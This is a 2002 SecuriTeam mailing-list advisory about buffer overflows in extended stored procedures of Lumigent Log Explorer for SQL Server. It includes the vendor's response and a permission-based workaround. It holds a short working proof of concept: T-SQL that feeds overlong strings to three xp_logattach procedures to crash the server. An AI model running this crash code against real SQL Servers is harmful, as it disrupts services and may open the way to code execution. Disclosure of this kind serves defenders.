[NT] Lumigent Log Explorer Extended Stored Procedures Buffer Overflow

From: support@securiteam.com
Date: 06/19/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Wed, 19 Jun 2002 09:57:04 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Lumigent Log Explorer Extended Stored Procedures Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
Server 7/2000. It ships with extended stored procedures implemented in
xp_logattach.dll. Some of them suffer from buffer overflows that lead to
SQL Server service crash and potentially to arbitrary code execution.

DETAILS

Vulnerable systems:
 * Lumigent Log Explorer version 3

Example:
Below is sample code that crashes SQL Server:
declare @bo varchar(8000)
set @bo = replicate('A', 800)
exec xp_logattach_StartProf @bo

declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach_setport @bo

declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach @bo

Procedures can be run only by dbo (master) by default.

Vendor response:
This issue will be fixed in our next scheduled maintenance release,
available in two to three weeks.

Workaround:
In the meantime, we recommend that you grant execute permissions on
Lumigent's extended stored procedures to trusted logins only (a useful
policy in any case). This prevents untrusted users from invoking stored
procedures with malicious intent.

ADDITIONAL INFORMATION

The information has been provided by <mailto:jimmers@yandex.ru> martin
rakhmanoff and <mailto:murray@lumigent.com> Murray S. Mazer.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages